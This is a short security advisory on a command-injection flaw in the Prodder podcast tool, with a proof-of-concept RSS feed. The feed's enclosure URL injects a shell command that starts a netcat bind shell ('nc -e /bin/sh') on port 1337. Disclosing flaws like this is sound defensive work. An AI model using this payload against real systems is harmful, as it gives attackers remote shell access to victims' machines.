source: https://www.securityfocus.com/bid/18068/info
Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary shell commands on the vulnerable computer in the context of the running application.
<?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl"?> <rss version="2.0"> <channel> <title>RedTeam Pentesting Example Malicious Server Feed</title> <item> <enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh -l -p 1337 & ';#'" length="241734" type="audio/mpeg" /> </item> </channel> </rss>